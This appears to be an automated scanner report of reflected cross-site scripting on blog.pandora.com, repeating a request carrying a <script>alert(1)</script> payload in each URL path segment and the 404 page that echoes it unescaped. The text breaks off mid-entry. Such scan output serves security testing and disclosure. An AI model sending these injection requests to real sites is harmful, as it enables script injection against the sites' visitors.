<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbc94c<script>alert(1)</script>9dc1dabafdc/2009/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload c2a57<script>alert(1)</script>b7dc6cce338 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:46 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009c2a57<script>alert(1)</script>b7dc6cce338/03/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 61662<script>alert(1)</script>e1daff6cf96 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:49 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/0361662<script>alert(1)</script>e1daff6cf96/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7af11<script>alert(1)</script>1a13f4a03d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora7af11<script>alert(1)</script>1a13f4a03d2/archives/2009/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload beaf3<script>alert(1)</script>b750ded26f8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivesbeaf3<script>alert(1)</script>b750ded26f8/2009/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 68bf4<script>alert(1)</script>2d188b48660 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200968bf4<script>alert(1)</script>2d188b48660/04/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 7adfa<script>alert(1)</script>b1f6f7ee47a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/047adfa<script>alert(1)</script>b1f6f7ee47a/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ee40e<script>alert(1)</script>6dc1333d8df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraee40e<script>alert(1)</script>6dc1333d8df/archives/2009/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 83b92<script>alert(1)</script>91c0dbd346e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives83b92<script>alert(1)</script>91c0dbd346e/2009/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 7b54d<script>alert(1)</script>4def9d0af6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:35 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 348 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/20097b54d<script>alert(1)</script>4def9d0af6/05/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 4fdb9<script>alert(1)</script>8f219a229f4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:38 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/054fdb9<script>alert(1)</script>8f219a229f4/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 5ddb1<script>alert(1)</script>d964ffd68f4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:30 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora5ddb1<script>alert(1)</script>d964ffd68f4/archives/2009/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 40560<script>alert(1)</script>8295fb9672e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives40560<script>alert(1)</script>8295fb9672e/2009/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 35d6a<script>alert(1)</script>61d8424a6b1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/200935d6a<script>alert(1)</script>61d8424a6b1/06/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6dc78<script>alert(1)</script>f9f9f8b2891 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:37 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/066dc78<script>alert(1)</script>f9f9f8b2891/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ea0d3<script>alert(1)</script>7e8e5ab80a9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:32 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandoraea0d3<script>alert(1)</script>7e8e5ab80a9/archives/2009/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e6355<script>alert(1)</script>dcc343d2bd0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:34 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archivese6355<script>alert(1)</script>dcc343d2bd0/2009/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload bdd32<script>alert(1)</script>e2655d97c30 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:36 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Content-Length: 349 Connection: close Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009bdd32<script>alert(1)</script>e2655d97c30/07/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b55f0<script>alert(1)</script>a60f65ec066 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:39 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora/archives/2009/07b55f0<script>alert(1)</script>a60f65ec066/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 9cddd<script>alert(1)</script>c07d7b6b6e1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ HTTP/1.1 Host: blog.pandora.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=118078728.1294536123.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/1; base_domain_ca44798cf7067942a82579c2c720f7dd=pandora.com; __utma=118078728.1770333999.1294536123.1294536123.1294536123.1; __utmc=118078728; fbsetting_ca44798cf7067942a82579c2c720f7dd=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utmb=118078728.7.10.1294536123; __qca=P0-1331252260-1294536122836;
Response
HTTP/1.1 404 Page Not Found Date: Sun, 09 Jan 2011 02:05:33 GMT Server: Apache/2.2.9 (Debian) Vary: Accept-Encoding Connection: close Content-Type: text/html Content-Length: 349
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /pandora9cddd<script>alert(1)</script>c07d7b6b6e1/archives/2009/08/ was not found on this server.</p> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 9fc45<script>alert(1)</script>73d64655690 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
